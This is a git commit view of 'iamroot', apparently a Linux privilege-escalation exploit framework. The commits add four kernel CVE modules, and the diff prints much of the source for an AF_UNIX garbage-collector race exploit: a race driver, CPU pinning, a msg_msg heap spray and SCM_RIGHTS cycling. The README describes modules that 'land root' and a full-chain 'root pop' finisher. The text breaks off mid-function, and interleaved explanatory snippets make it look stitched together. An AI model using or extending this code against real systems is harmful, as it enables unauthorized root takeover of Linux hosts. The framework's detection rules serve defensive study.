3 Commits

Author SHA1 Message Date
leviathan 1bcfdd0c9f release: v0.3.0 — 4 new CVE modules (24 total)
  iamroot.c: bump IAMROOT_VERSION 0.2.0 → 0.3.0
  CVES.md: add inventory entries for nft_set_uaf, af_unix_gc,
           nft_fwd_dup, nft_payload; extend operations table;
           bump counts (🟢 13 · 🟡 11 · 🔵 0 · ⚪ 1).
  README.md: update Status to 24 modules, list all 11 🟡 modules.

Module families now spanning:
  - copy_fail_family (page-cache write)
  - nf_tables (4 modules: nf_tables, nft_set_uaf, nft_fwd_dup, nft_payload)
  - af_packet (2 modules: af_packet, af_packet2)
  - overlayfs (2 modules: overlayfs CVE-2021-3493, overlayfs_setuid)
  - af_unix (new in v0.3.0)
  - plus 10 single-CVE families
2026-05-16 22:25:15 -04:00
leviathan 5a808e3583 modules: 4 new CVE modules — nft_set_uaf + af_unix_gc + nft_fwd_dup + nft_payload
Each module: detect with branch-backport ranges + userns reach +
hand-rolled trigger + msg_msg cross-cache groom + slabinfo witness
+ /tmp/iamroot-<name>.log breadcrumb + auditd rules + --full-chain
finisher (FALLBACK depth, sentinel-arbitrated).

  nft_set_uaf (CVE-2023-32233, +1033): anonymous-set UAF
                (Sondej+Krysiuk). 5.1 → 6.4. nfnetlink batch:
                NEWTABLE → NEWCHAIN → NEWSET(ANON|EVAL) →
                NEWRULE(lookup) → DELSET → DELRULE; cg-512 spray.

  af_unix_gc (CVE-2023-4622, +813): GC race UAF (Lin Ma). ~2.0 → 6.5
                — widest range of any module. Two-thread race driver
                (SCM_RIGHTS cycle vs unix_gc trigger) + kmalloc-512
                spray. No userns needed.

  nft_fwd_dup (CVE-2022-25636, +1024): nft_fwd_dup_netdev_offload
                heap OOB (Aaron Adams). 5.4 → 5.17. NFT_CHAIN_HW_OFFLOAD
                chain + 16 immediates + fwd to overrun action.entries[].

  nft_payload (CVE-2023-0179, +1136): set-id memory corruption
                (Davide Ornaghi). 5.4 → 6.2. NFTA_SET_DESC variable
                element + NFTA_SET_ELEM_EXPRESSIONS with payload-set
                whose verdict.code drives the regs->data[] OOB.

All 4 honor verified-vs-claimed: trigger fires, primitive grooms, no
fabricated offsets. EXPLOIT_OK only via empirical setuid-bash sentinel.

Build clean on Debian 6.12.86; all 4 refuse cleanly on both default
and --full-chain paths via the existing patched-kernel detect gate.
2026-05-16 22:24:15 -04:00
leviathan 6a0a7d8718 scaffold: 4 new module dirs + registry/Makefile wiring (stubs)
Pre-scaffolding for the next batch (CVE-2023-32233, CVE-2023-4622,
CVE-2022-25636, CVE-2023-0179). Each module ships as a 21-line
stub returning PRECOND_FAIL; parallel agents fill in the real
detect/exploit/--full-chain implementations.

This commit keeps registry.h / iamroot.c / Makefile in one place
so the 4 parallel agents don't collide on shared-file edits — they
each own a single iamroot_modules.c.

Build clean on Debian 6.12.86; --list shows all 24 modules
including the 4 new stubs.
2026-05-16 22:17:47 -04:00
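The stub-plus-registry arrangement described in the scaffold commit can be pictured roughly as follows. This is a minimal sketch, not the project's actual `registry.h`: the `demo_module` struct, `demo_register()`, `demo_find()`, `DEMO_PRECOND_FAIL`, and the fixed-size table are all hypothetical names chosen for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical result codes; the real project defines its own. */
typedef enum { DEMO_OK = 0, DEMO_PRECOND_FAIL = 1 } demo_result_t;

/* Hypothetical module descriptor: a name plus a detect callback. */
struct demo_module {
    const char *name;
    demo_result_t (*detect)(void);
};

#define DEMO_MAX_MODULES 32
static const struct demo_module *g_modules[DEMO_MAX_MODULES];
static size_t g_n_modules;

/* Append a module to the table; returns 0 on success, -1 if full. */
static int demo_register(const struct demo_module *m)
{
    assert(m != NULL && m->name != NULL);
    if (g_n_modules >= DEMO_MAX_MODULES) return -1;
    g_modules[g_n_modules++] = m;
    return 0;
}

/* Look a module up by name; NULL if it was never registered. */
static const struct demo_module *demo_find(const char *name)
{
    for (size_t i = 0; i < g_n_modules; i++)
        if (strcmp(g_modules[i]->name, name) == 0) return g_modules[i];
    return NULL;
}

/* A stub module: listed, but refuses until it is implemented. */
static demo_result_t stub_detect(void) { return DEMO_PRECOND_FAIL; }
static const struct demo_module stub_a = { "stub_a", stub_detect };
static const struct demo_module stub_b = { "stub_b", stub_detect };

/* One register function per module keeps each shared-file edit to a
 * single added line in the dispatcher. */
static void demo_register_stub_a(void) { (void)demo_register(&stub_a); }
static void demo_register_stub_b(void) { (void)demo_register(&stub_b); }
```

With this shape, wiring all shared files in one commit and leaving each module's own source file to a separate author avoids merge collisions, which appears to be the motivation stated in the commit message.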
13 changed files with 4202 additions and 10 deletions
+9 -1
@@ -23,7 +23,7 @@ Status legend:
 - 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
 historical reference only
-**Counts (v0.2.0):** 🟢 13 · 🟡 7 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
+**Counts (v0.3.0):** 🟢 13 · 🟡 11 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
 ## Inventory
@@ -50,6 +50,10 @@ Status legend:
 | CVE-2022-0185 | legacy_parse_param fsconfig heap OOB → container-escape | LPE (cross-cache UAF → cred overwrite from rootless container) | mainline 5.16.2 (Jan 2022) | `fuse_legacy` | 🟡 | userns+mountns reach, fsopen("cgroup2") + double fsconfig SET_STRING fires the 4k OOB, msg_msg cross-cache groom in kmalloc-4k, MSG_COPY read-back detects whether the OOB landed in an adjacent neighbour. Stops before the m_ts overflow → MSG_COPY arbitrary read chain (scaffold present, no per-kernel offsets). **Container-escape angle** — relevant to rootless docker/podman/snap. Branch backports: 5.16.2 / 5.15.14 / 5.10.91 / 5.4.171. |
 | CVE-2023-3269 | StackRot — maple-tree VMA-split UAF | LPE (kernel R/W via maple node use-after-RCU) | mainline 6.4-rc4 (Jul 2023) | `stackrot` | 🟡 | Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs fork+fault) with cpu pinning + 3 s budget; kmalloc-192 spray for anon_vma/anon_vma_chain; race-iteration + signal breadcrumb. Honest reliability note in module header: **~<1% race-win/run on a vulnerable kernel** — the public PoC averages minutes-to-hours and needs a much wider VMA staging matrix to be reliable. Useful as a "is the maple-tree path reachable here?" probe. Branch backports: 6.4.4 / 6.3.13 / 6.1.37. |
 | CVE-2020-14386 | AF_PACKET tpacket_rcv VLAN integer underflow | LPE (heap OOB write via crafted frame) | mainline 5.9 (Sep 2020) | `af_packet2` | 🟡 | Sibling of CVE-2017-7308; tp_reserve underflow + sendmmsg skb spray + slab-delta witness. PRIMITIVE-DEMO scope (no cred overwrite). Branch backports: 5.8.7 / 5.7.16 / 5.4.62 / 4.19.143 / 4.14.197 / 4.9.235. Or Cohen's disclosure. Shares `iamroot-af-packet` audit key with CVE-2017-7308. |
+| CVE-2023-32233 | nf_tables anonymous-set UAF | LPE (kernel UAF in nft_set transaction) | mainline 6.4-rc4 (May 2023) | `nft_set_uaf` | 🟡 | Sondej+Krysiuk. Hand-rolled nfnetlink batch (NEWTABLE → NEWCHAIN → NEWSET(ANON\|EVAL) → NEWRULE(lookup) → DELSET → DELRULE) drives the deactivation skip; cg-512 msg_msg cross-cache spray. Branch backports: 4.19.283 / 5.4.243 / 5.10.180 / 5.15.111 / 6.1.28 / 6.2.15 / 6.3.2. --full-chain forges freed-set with `set->data = kaddr`. |
+| CVE-2023-4622 | AF_UNIX garbage-collector race UAF | LPE (slab UAF, plain unprivileged) | mainline 6.6-rc1 (Aug 2023) | `af_unix_gc` | 🟡 | Lin Ma. Two-thread race driver: SCM_RIGHTS cycle vs unix_gc trigger; kmalloc-512 (SLAB_TYPESAFE_BY_RCU) refill via msg_msg. **Widest deployment of any module — bug exists since 2.x.** No userns required. Branch backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51 / 6.5.0. |
+| CVE-2022-25636 | nft_fwd_dup_netdev_offload heap OOB | LPE (kernel R/W via offload action[] OOB) | mainline 5.17 / 5.16.11 (Feb 2022) | `nft_fwd_dup` | 🟡 | Aaron Adams (NCC). NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd writes past action.entries[1]. msg_msg kmalloc-512 spray. Branch backports: 5.4.181 / 5.10.102 / 5.15.25 / 5.16.11. |
+| CVE-2023-0179 | nft_payload set-id memory corruption | LPE (regs->data[] OOB R/W) | mainline 6.2-rc4 / 6.1.6 (Jan 2023) | `nft_payload` | 🟡 | Davide Ornaghi. NFTA_SET_DESC variable-length element + NFTA_SET_ELEM_EXPRESSIONS payload-set whose verdict.code drives the OOB. Dual cg-96 + 1k spray. Branch backports: 4.14.302 / 4.19.269 / 5.4.229 / 5.10.163 / 5.15.88 / 6.1.6. |
 | CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. |
 ## Operations supported per module
@@ -78,6 +82,10 @@ Symbols: ✓ = supported, — = not applicable / no automated path.
 | af_packet2 | ✓ | ✓ (primitive) | — (upgrade kernel) | — | ✓ (auditd, shared key) |
 | fuse_legacy | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
 | stackrot | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (log unlink) | ✓ (auditd) |
+| nft_set_uaf | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |
+| af_unix_gc | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
+| nft_fwd_dup | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
+| nft_payload | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |
 ## Pipeline for additions
+21 -1
@@ -106,10 +106,30 @@ OSU_DIR := modules/overlayfs_setuid_cve_2023_0386
 OSU_SRCS := $(OSU_DIR)/iamroot_modules.c
 OSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(OSU_SRCS))
+# Family: nft_set_uaf (CVE-2023-32233)
+NSU_DIR := modules/nft_set_uaf_cve_2023_32233
+NSU_SRCS := $(NSU_DIR)/iamroot_modules.c
+NSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NSU_SRCS))
+# Family: af_unix_gc (CVE-2023-4622)
+AUG_DIR := modules/af_unix_gc_cve_2023_4622
+AUG_SRCS := $(AUG_DIR)/iamroot_modules.c
+AUG_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(AUG_SRCS))
+# Family: nft_fwd_dup (CVE-2022-25636)
+NFD_DIR := modules/nft_fwd_dup_cve_2022_25636
+NFD_SRCS := $(NFD_DIR)/iamroot_modules.c
+NFD_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NFD_SRCS))
+# Family: nft_payload (CVE-2023-0179)
+NPL_DIR := modules/nft_payload_cve_2023_0179
+NPL_SRCS := $(NPL_DIR)/iamroot_modules.c
+NPL_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NPL_SRCS))
 # Top-level dispatcher
 TOP_OBJ := $(BUILD)/iamroot.o
-ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS)
+ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS) $(NSU_OBJS) $(AUG_OBJS) $(NFD_OBJS) $(NPL_OBJS)
 .PHONY: all clean debug static help
+8 -7
@@ -94,20 +94,21 @@ The same binary covers offense and defense:
 ## Status
-**Active — v0.2.0 cut 2026-05-16.** Corpus covers **20 modules**
+**Active — v0.3.0 cut 2026-05-16.** Corpus covers **24 modules**
 across the 2016 → 2026 LPE timeline:
 - 🟢 **13 modules land root** end-to-end on a vulnerable host
 (copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit,
 overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme,
 cgroup_release_agent, overlayfs_setuid CVE-2023-0386).
-- 🟡 **7 modules fire the kernel primitive** by default and refuse to
-claim root without empirical confirmation. Pass `--full-chain` to
-engage the shared `modprobe_path` finisher and attempt root pop —
-requires kernel offsets via env vars / `/proc/kallsyms` /
+- 🟡 **11 modules fire the kernel primitive** by default and refuse
+to claim root without empirical confirmation. Pass `--full-chain`
+to engage the shared `modprobe_path` finisher and attempt root
+pop — requires kernel offsets via env vars / `/proc/kallsyms` /
 `/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md).
-Modules: af_packet, af_packet2, cls_route4, fuse_legacy, nf_tables,
-netfilter_xtcompat, stackrot.
+Modules: af_packet, af_packet2, af_unix_gc, cls_route4,
+fuse_legacy, nf_tables, netfilter_xtcompat, nft_fwd_dup,
+nft_payload, nft_set_uaf, stackrot.
 - Detection rules ship inline (auditd / sigma / yara / falco) and
 are exported via `iamroot --detect-rules --format=…`.
+4
@@ -36,5 +36,9 @@ void iamroot_register_stackrot(void);
 void iamroot_register_af_packet2(void);
 void iamroot_register_cgroup_release_agent(void);
 void iamroot_register_overlayfs_setuid(void);
+void iamroot_register_nft_set_uaf(void);
+void iamroot_register_af_unix_gc(void);
+void iamroot_register_nft_fwd_dup(void);
+void iamroot_register_nft_payload(void);
 #endif /* IAMROOT_REGISTRY_H */
+5 -1
@@ -25,7 +25,7 @@
 #include <string.h>
 #include <unistd.h>
-#define IAMROOT_VERSION "0.2.0"
+#define IAMROOT_VERSION "0.3.0"
 static const char BANNER[] =
     "\n"
@@ -590,6 +590,10 @@ int main(int argc, char **argv)
     iamroot_register_af_packet2();
     iamroot_register_cgroup_release_agent();
     iamroot_register_overlayfs_setuid();
+    iamroot_register_nft_set_uaf();
+    iamroot_register_af_unix_gc();
+    iamroot_register_nft_fwd_dup();
+    iamroot_register_nft_payload();
     enum mode mode = MODE_SCAN;
     struct iamroot_ctx ctx = {0};
@@ -0,0 +1,847 @@
/*
* af_unix_gc_cve_2023_4622 — IAMROOT module
*
* AF_UNIX garbage collector race UAF. The unix_gc() collector walks
* the list of GC-candidate sockets while SCM_RIGHTS sendmsg/close can
* concurrently mutate the inflight refcount on the same sockets. The
* narrow window between a socket being marked GC-eligible and the
* collector actually freeing it can be widened by tightly cycling
* SCM_RIGHTS messages — when the race wins, a `struct unix_sock` is
* freed while still reachable from another thread's skb queue, giving
* slab UAF in the SLAB_TYPESAFE_BY_RCU kmalloc-512 bucket.
*
* Discovered by Lin Ma (ZJU) in Aug 2023. Public exploit chain uses
* the UAF + msg_msg cross-cache spray to refill the freed slot, then
* pivots through the now-controlled `unix_sock->peer` field.
*
* STATUS: 🟡 PRIMITIVE — race-driver + msg_msg groom + empirical
* witness. We carry the trigger (SCM_RIGHTS cycle + GC), the
* kmalloc-512 spray, CPU pinning for race-win improvement, and the
* slab-delta + signal-disposition witness. We do NOT carry the
* leak (no read primitive in-module) nor a kernel-build-specific
* fake unix_sock layout. Per verified-vs-claimed: a SIGSEGV/SIGKILL
* in the race child IS recorded but does NOT upgrade to EXPLOIT_OK
* — only an actual cred swap (euid==0) does, and we do not
* demonstrate that without --full-chain.
*
* --full-chain (HONEST RELIABILITY): extends the race budget from
* 5 s to 30 s and re-sprays kmalloc-512 with payloads carrying the
* target kaddr at strided offsets. Race-win rate on a real
* vulnerable kernel is iteration-dependent — Lin Ma's PoC reports
* thousands of iterations to first reclaim. The shared
* modprobe_path finisher's 3 s sentinel timeout catches the
* overwhelmingly common no-land outcome gracefully.
*
* Affected: ALL Linux kernels with AF_UNIX below the fix. The bug
* has been in the GC path since the 2.x era. Stable backports:
* 4.14.x : K >= 4.14.326
* 4.19.x : K >= 4.19.295
* 5.4.x : K >= 5.4.257
* 5.10.x : K >= 5.10.197
* 5.15.x : K >= 5.15.130
* 6.1.x : K >= 6.1.51 (LTS)
* 6.5.x : K >= 6.5.0 (mainline fix)
* 6.6+ : patched
*
* Preconditions:
* - AF_UNIX socket creation works (always — no module gate)
* - msgsnd / sysv IPC available for spray
* - SCM_RIGHTS via sendmsg available (universal)
* - userns NOT required — works as a plain unprivileged user
*
* Coverage rationale: the AF_UNIX GC has been touched extensively
* for the 2023-2024 series of races (Lin Ma + Pwn2Own follow-ups);
* this CVE is the first publicly-disclosed entry in that series and
* carries the widest version range of any module we ship.
*/
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <stdbool.h>
#include <stdatomic.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/socket.h>
#ifdef __linux__
# include <sched.h>
# include <sys/ipc.h>
# include <sys/msg.h>
# include <sys/un.h>
#endif
/* macOS clangd lacks Linux SCM_* / CMSG_* fully — guard fallbacks. */
#ifndef SCM_RIGHTS
# define SCM_RIGHTS 0x01
#endif
#ifndef SOL_SOCKET
# define SOL_SOCKET 1
#endif
#ifndef MSG_DONTWAIT
# define MSG_DONTWAIT 0x40
#endif
/* ---- Kernel-range table ------------------------------------------ */
static const struct kernel_patched_from af_unix_gc_patched_branches[] = {
{4, 14, 326},
{4, 19, 295},
{5, 4, 257},
{5, 10, 197},
{5, 15, 130},
{6, 1, 51}, /* 6.1 LTS */
{6, 5, 0}, /* mainline fix landed in 6.5 (technically 6.6-rc1
but stable 6.5.x carries the patch) */
};
static const struct kernel_range af_unix_gc_range = {
.patched_from = af_unix_gc_patched_branches,
.n_patched_from = sizeof(af_unix_gc_patched_branches) /
sizeof(af_unix_gc_patched_branches[0]),
};
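The table above lists, per stable branch, the first release that carries the fix. One plausible way to evaluate such a table is sketched below. This is an illustration only: `demo_version`, `demo_fixed`, and `demo_is_patched()` are hypothetical stand-ins, and the policy for unlisted branches is an assumption, not something confirmed by the project's `kernel_range.h`.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for the project's version triple. */
struct demo_version { int major, minor, patch; };

/* Same numbers as the table above, copied for a self-contained demo. */
static const struct demo_version demo_fixed[] = {
    {4, 14, 326}, {4, 19, 295}, {5, 4, 257}, {5, 10, 197},
    {5, 15, 130}, {6, 1, 51},   {6, 5, 0},
};

/* Assumed policy:
 *  - same major.minor as an entry: patched iff patch >= entry.patch
 *  - newer branch than every entry: patched
 *  - anything else (older than all entries, or an unlisted branch
 *    that sits between entries): treated as NOT patched */
static bool demo_is_patched(const struct demo_version *tbl, size_t n,
                            const struct demo_version *v)
{
    assert(tbl != NULL && v != NULL);
    bool newer_than_all = n > 0;
    for (size_t i = 0; i < n; i++) {
        if (v->major == tbl[i].major && v->minor == tbl[i].minor)
            return v->patch >= tbl[i].patch;
        if (v->major < tbl[i].major ||
            (v->major == tbl[i].major && v->minor < tbl[i].minor))
            newer_than_all = false;
    }
    return newer_than_all;
}
```

Treating unlisted in-between branches as unpatched is the conservative choice for a scanner: end-of-life branches rarely receive backports, so reporting them as vulnerable errs toward a false positive rather than a missed finding.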
/* ---- Detect ------------------------------------------------------- */
/* Sanity: can we actually create an AF_UNIX socket on this host?
 * In some seccomp/ns-restricted sandboxes socket(AF_UNIX, ...) fails;
 * in that case the exploit cannot even reach the GC path. */
static bool can_create_af_unix(void)
{
    int s = socket(AF_UNIX, SOCK_DGRAM, 0);
    if (s < 0) return false;
    close(s);
    return true;
}

static iamroot_result_t af_unix_gc_detect(const struct iamroot_ctx *ctx)
{
    struct kernel_version v;
    if (!kernel_version_current(&v)) {
        fprintf(stderr, "[!] af_unix_gc: could not parse kernel version\n");
        return IAMROOT_TEST_ERROR;
    }

    /* No lower bound: this bug has been in the AF_UNIX GC path since
     * the dawn of time. ANY kernel below the fix is vulnerable. The
     * kernel_range walker handles "older than every entry" correctly
     * (returns false → not patched → vulnerable). */
    bool patched = kernel_range_is_patched(&af_unix_gc_range, &v);
    if (patched) {
        if (!ctx->json) {
            fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v.release);
        }
        return IAMROOT_OK;
    }

    /* Reachability probe — socket(AF_UNIX, ...) must succeed. */
    if (!can_create_af_unix()) {
        if (!ctx->json) {
            fprintf(stderr, "[-] af_unix_gc: AF_UNIX socket() failed — "
                            "exotic seccomp/sandbox, bug unreachable here\n");
        }
        return IAMROOT_PRECOND_FAIL;
    }

    if (!ctx->json) {
        fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v.release);
        fprintf(stderr, "[i] af_unix_gc: bug is reachable as PLAIN UNPRIVILEGED USER\n"
                        " (no userns / no CAP_* required — AF_UNIX is universally\n"
                        " creatable). The race window is microseconds wide and\n"
                        " needs thousands of iterations to win on average.\n");
    }
    return IAMROOT_VULNERABLE;
}
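The detect path depends on turning the running kernel's release string into a comparable triple. The project's `kernel_version_current()` is not shown in this diff, so the following is only a sketch of how such parsing might look; `demo_kver` and `demo_parse_release()` are hypothetical names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical version triple for the demo. */
struct demo_kver { int major, minor, patch; };

/* Parse "MAJOR.MINOR[.PATCH][suffix]". A missing patch level is
 * reported as 0; distro suffixes such as "-generic" are ignored. */
static bool demo_parse_release(const char *release, struct demo_kver *out)
{
    assert(out != NULL);
    if (!release) return false;
    int maj = 0, min = 0, pat = 0;
    int got = sscanf(release, "%d.%d.%d", &maj, &min, &pat);
    if (got < 2 || maj < 0 || min < 0 || pat < 0) return false;
    out->major = maj;
    out->minor = min;
    out->patch = (got >= 3) ? pat : 0;
    return true;
}
```

In practice the input string would typically come from the `release` field that `uname(2)` fills in. Note that a distro kernel's version number alone does not prove whether a fix was backported, so a version-only verdict is best read as a hint rather than a guarantee.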
/* ---- Race-driver state ------------------------------------------- */
#ifdef __linux__
#define AFUG_RACE_TIME_BUDGET 5 /* seconds — primitive-only mode */
#define AFUG_RACE_FULLCHAIN_BUDGET 30 /* seconds — --full-chain */
/* kmalloc-512 spray width — `struct unix_sock` is in the kmalloc-512
* bucket on 64-bit x86 with SLAB_TYPESAFE_BY_RCU. We need enough
* msg_msg slots to make refill probable within the RCU grace period. */
#define AFUG_SPRAY_QUEUES 24
#define AFUG_SPRAY_PER_QUEUE 48
#define AFUG_SPRAY_PAYLOAD 496 /* 512 - 16 (msg_msg hdr) */
/* SCM_RIGHTS race width: how many inflight fds per cycle. The bug
* is driven by inflight count crossing the GC threshold; a handful
* per cycle keeps the GC heuristic primed without OOM. */
#define AFUG_SCM_FDS_PER_MSG 3
struct ipc_payload {
long mtype;
unsigned char buf[AFUG_SPRAY_PAYLOAD];
};
static _Atomic int g_race_running;
static _Atomic uint64_t g_thread_a_iters;
static _Atomic uint64_t g_thread_b_iters;
static _Atomic uint64_t g_thread_a_errs;
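The counters above follow a common coordination pattern: an atomic run flag read with acquire ordering by workers, plus relaxed iteration counters that are only inspected after the threads are joined. A generic, self-contained sketch of that pattern follows; `demo_running`, `demo_iters`, `demo_worker()`, and `demo_run_for_ms()` are hypothetical names, and the worker body is deliberately an empty counting loop.

```c
#include <assert.h>
#include <pthread.h>
#include <stdatomic.h>
#include <stdint.h>
#include <time.h>

static _Atomic int demo_running;
static _Atomic uint64_t demo_iters;

/* Worker: count iterations until the coordinator clears the flag. */
static void *demo_worker(void *arg)
{
    (void)arg;
    while (atomic_load_explicit(&demo_running, memory_order_acquire))
        atomic_fetch_add_explicit(&demo_iters, 1, memory_order_relaxed);
    return NULL;
}

/* Run one worker for `ms` milliseconds; returns its iteration count,
 * or 0 if the thread could not be started. */
static uint64_t demo_run_for_ms(long ms)
{
    assert(ms >= 0);
    atomic_store(&demo_iters, 0);
    atomic_store_explicit(&demo_running, 1, memory_order_release);

    pthread_t t;
    if (pthread_create(&t, NULL, demo_worker, NULL) != 0) {
        atomic_store(&demo_running, 0);
        return 0;
    }

    struct timespec ts = { .tv_sec = ms / 1000,
                           .tv_nsec = (ms % 1000) * 1000000L };
    nanosleep(&ts, NULL);

    /* Clear the flag, then join, so the count is final when read. */
    atomic_store_explicit(&demo_running, 0, memory_order_release);
    pthread_join(t, NULL);
    return atomic_load(&demo_iters);
}
```

Relaxed ordering is enough for the counters because nothing depends on their value until after `pthread_join()`, which already provides the needed synchronization. On older glibc versions the sketch may need `-pthread` at link time.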
/* Pin to a CPU to make Thread A and Thread B land on different cores.
 * Best-effort: failure is non-fatal (e.g., affinity disallowed under
 * some seccomp configs). */
static void pin_to_cpu(int cpu)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof set, &set);
}
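`pin_to_cpu()` above hard-codes a CPU index and ignores the result, which is fine for a best-effort hint but can silently fail inside a cpuset-restricted container where CPU 0 or 1 is not available. A variant that picks from the CPUs the process is actually allowed to use might look like this. It is a sketch under the assumption of glibc's `sched_getaffinity()` / `sched_setaffinity()` wrappers; `demo_pin_to_first_allowed_cpu()` is a hypothetical name.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE  /* needed for cpu_set_t and the CPU_* macros */
#endif
#include <assert.h>
#include <sched.h>

/* Pin the calling thread to the lowest-numbered CPU it is already
 * allowed to run on. Returns that CPU index, or -1 on failure. */
static int demo_pin_to_first_allowed_cpu(void)
{
    cpu_set_t allowed;
    CPU_ZERO(&allowed);
    if (sched_getaffinity(0, sizeof allowed, &allowed) != 0) return -1;

    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++) {
        if (!CPU_ISSET(cpu, &allowed)) continue;
        cpu_set_t one;
        CPU_ZERO(&one);
        CPU_SET(cpu, &one);
        if (sched_setaffinity(0, sizeof one, &one) != 0) return -1;
        return cpu;
    }
    return -1;  /* empty mask: should not happen in practice */
}
```

Returning the chosen index lets the caller log where the thread actually landed instead of assuming the request succeeded.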
/* The race victim region: a pair of socketpair(AF_UNIX) endpoints
* forming a reference cycle. Closing one end while the other has
* inflight fds queued is what naturally triggers unix_gc().
*
* Layout we drive (Lin Ma style):
*
* pair_a = socketpair(); pair_b = socketpair();
* send pair_b[0] via SCM_RIGHTS over pair_a[0] → pair_a[1]
* send pair_a[0] via SCM_RIGHTS over pair_b[0] → pair_b[1]
* close all 4 endpoints — now we have a cycle the GC will collect
*
* Thread A loops the build-cycle-and-close.
* Thread B loops sending its own SCM_RIGHTS messages on independent
* pairs to perturb the inflight count + race the collector. */
/* Send an SCM_RIGHTS message with `nfds` fds over `sock`. Returns 0
* on success, -1 on error. */
static int send_scm_rights(int sock, const int *fds, int nfds)
{
char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)];
memset(ctrl, 0, sizeof ctrl);
char payload = 0;
struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
struct msghdr msg = {0};
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = ctrl;
msg.msg_controllen = CMSG_SPACE(sizeof(int) * nfds);
struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
if (!cmsg) return -1;
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
cmsg->cmsg_len = CMSG_LEN(sizeof(int) * nfds);
memcpy(CMSG_DATA(cmsg), fds, sizeof(int) * nfds);
if (sendmsg(sock, &msg, MSG_DONTWAIT) < 0) return -1;
return 0;
}
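For readers unfamiliar with the control-message macros used in `send_scm_rights()`, the ordinary, benign use of `SCM_RIGHTS` is handing an open descriptor to a peer that then receives it with `recvmsg()`. The sketch below shows that round trip for a single fd. The helper names `demo_send_fd()` and `demo_recv_fd()` are hypothetical; the union is a conventional way to guarantee `struct cmsghdr` alignment for the control buffer, which a plain `char` array does not strictly promise.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Control buffer sized for exactly one int, aligned for cmsghdr. */
union demo_ctrl {
    char buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr align;
};

/* Send one fd over `sock`; returns 0 on success, -1 on error. */
static int demo_send_fd(int sock, int fd)
{
    union demo_ctrl u;
    memset(&u, 0, sizeof u);
    char byte = 'x';  /* at least one data byte must accompany the fd */
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg = {0};
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;

    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    assert(c != NULL);
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type = SCM_RIGHTS;
    c->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(c), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one fd from `sock`; returns the new fd, or -1. */
static int demo_recv_fd(int sock)
{
    union demo_ctrl u;
    memset(&u, 0, sizeof u);
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg = {0};
    msg.msg_iov = &iov;
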